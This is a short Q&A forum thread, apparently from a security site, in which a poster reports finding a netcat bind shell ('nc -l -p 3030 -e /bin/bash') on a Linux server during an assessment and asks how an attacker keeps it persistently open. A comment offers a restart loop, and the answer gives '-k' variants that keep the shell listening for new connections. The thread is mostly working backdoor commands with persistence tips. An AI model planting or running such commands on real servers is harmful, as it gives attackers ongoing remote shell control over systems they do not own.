# Persistent back door using Netcat

Tags: network-scanners, backdoor, netcat

I have found the following command several times in one of the linux servers during an assessment:

```
nc -l -p 3030 -e /bin/bash
```

This enables a hacker to gain control over this sever via bash.
By testing it, I realized that whenever the client interrupts the connection, the door is again closed.

Is there a way for the hacker to keep this door persistently opened?

Comment: just restart it whenever it exits `while [ true ]; do nc -l -p 3030 -e /bin/bash; done`

Answer (score 3):

Nc with `-k` option will help.

```
nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash
```

Forces nc to stay listening for another connection after its current connection is completed. It is an error to use this option without the `-l` option. When used together with the `-u` option, the server socket is not connected and it can receive UDP datagrams from multiple hosts.